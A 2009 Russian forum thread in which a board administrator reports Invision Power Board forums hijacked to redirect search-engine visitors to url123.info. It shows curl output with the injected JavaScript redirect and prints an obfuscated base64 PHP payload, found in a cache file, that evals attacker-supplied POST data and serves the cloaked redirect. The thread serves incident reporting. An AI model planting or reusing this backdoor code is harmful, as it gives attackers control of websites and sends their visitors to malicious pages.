darkden Опубликовано 31 Августа 2009 Жалоба Поделиться Опубликовано 31 Августа 2009 Способ проникновения пока не вычислили! Опишу эффект от проникновения!Всем пользователям пришедшим с поисковиков вместо обычного контента подставляется редикретк на url123.info/хххххххх вот зараженные форумы www.fiberglassrv.com www.inheritanceforums.com, думаю если погуглить можно найти еще массу curl -i -H "Host: www.fiberglassrv.com" "http://www.fiberglassrv.com/board/" -e "http://yandex.ru" HTTP/1.1 200 OK Date: Mon, 31 Aug 2009 18:29:06 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5 X-Powered-By: PHP/5.2.5 Set-Cookie: newsession_id=938bc19f5cc2dc564ec11e3a3252152b; path=/board; domain=.fiberglassrv.com; httponly Set-Cookie: ipb2=1; expires=Tue, 01-Sep-2009 18:29:06 GMT Content-Length: 113 Connection: close Content-Type: text/html <html><body><script type="text/javascript">document.location='http://url123.info/56f70458'</script></body></html> curl -i -H "Host: www.inheritanceforums.com" "http://www.inheritanceforums.com/" -e "http://www.google.ru" HTTP/1.1 200 OK Date: Mon, 31 Aug 2009 18:47:03 GMT Server: Apache/2 X-Powered-By: PHP/4.4.9 Set-Cookie: session_id=f33934e2fe7c77009710b439bd415e76; path=/; domain=.inheritanceforums.com; HttpOnly Set-Cookie: ipb2=1; expires=Tue, 01 Sep 2009 18:47:03 GMT Vary: Accept-Encoding,User-Agent Content-Length: 113 Content-Type: text/html <html><body><script type="text/javascript">document.location='http://url123.info/04530218'</script></body></html> Эти Форумы 2.х, мой форум 3.х версии, домен появился 9 июля, так что уязвимость новая, в сети про нее еще нету ничего... в кеше найден код в base64/forum/cache/lang_cache/2/core_public_global.phpache/lang_cache/2/core_public_global.php JHg9bWQ1KCc5aDdyJyk7aWYoaXNzZXQoJF9QT1NUWyR4XSkpZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9y b3QxMygkX1BPU1RbJHhdKSkpOw0KaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLDApO2luaV9zZXQoJ2xv Z 19lcnJvcnMnLDApOw0KJHI9IWVtcHR5KCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSkgPyAkX1NFUlZFU l snSFRUUF9SRUZFUkVSJ10gOiBnZXRlbnYoJ0hUVFBfUkVGRVJFUicpOw0KaWYoc3RybGVuKCRyKT4xMC k NCnsNCgkkaXA9JF9TRVJWRVJbJ1JFTU9URV9BRERSJ107JGhuPUBnZXRob3N0YnlhZGRyKCRpcCk7DQo J aWYoKHN0cnBvcygkaXAsJzY1LjU1LicpIT09MCkmJihzdHJwb3MoJGhuLCdtc25ib3QnKT09PWZhbHNl K SkNCgl7DQoJCSRzPWFycmF5KCdzZWFyY2gubGl2ZS5jb20nLCd3d3cuZ29vZ2xlJywnc2VhcmNoLnlha G 9vLmNvbScsJ3d3dy5iaW5nLmNvbScsJ3lhbmRleC5ydScsJ2JhaWR1LmNvbScpOw0KCQlmb3JlYWNoKC R zIGFzICRlKQ0KCQl7DQoJCQlpZigoc3RycG9zKCRyLCRlKSE9PWZhbHNlKSYmKGVtcHR5KCRfQ09PS0l F WydpcGIyJ10pKSkNCgkJCXsNCgkJCQlAc2V0Y29va2llKCdpcGIyJywnMScsdGltZSgpKzg2NDAwKTsN C gkJCQkkaD1zdWJzdHIoQG1kNSgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pLDAsOCk7DQoJCQkJZWNobyAiP G h0bWw.chr(43).PGJvZHk.chr(43).PHNjcmlwdCB0eXBlPVwidGV4dC9qYXZhc2NyaXB0XCI.chr(43).ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly91cmwxMjMuaW5mby8kaCc8L3NjcmlwdD48L2JvZHk .chr(43).PC9odG1sPiI7DQoJCQkJZXhpdDsNCgkJCX0NCgkJfQ0KCX0gDQp9 Судя по тому, что уязвимость найдена в кеше, есть подозрение, что дальше кеша, злоумышленник не может проникнуть. После ребилда кеша, код пропал... Ссылка на комментарий Поделиться на других сайтах Прочее
Ritsuka Опубликовано 31 Августа 2009 Жалоба Поделиться Опубликовано 31 Августа 2009 Лиценз или нулл?) Ссылка на комментарий Поделиться на других сайтах Прочее
FatCat Опубликовано 31 Августа 2009 Жалоба Поделиться Опубликовано 31 Августа 2009 Лиценз или нулл?)Первый не открылся, а второй, похоже, лицензия: http://www.inheritanceforums.com/index.php...122&t=52245 - в принтпейдже с копирайтами полный ажур, как правило нуллеры там свои следы оставляют, а горе-админы про принтпейджи не вспоминают. Ссылка на комментарий Поделиться на других сайтах Прочее
Рекомендуемые сообщения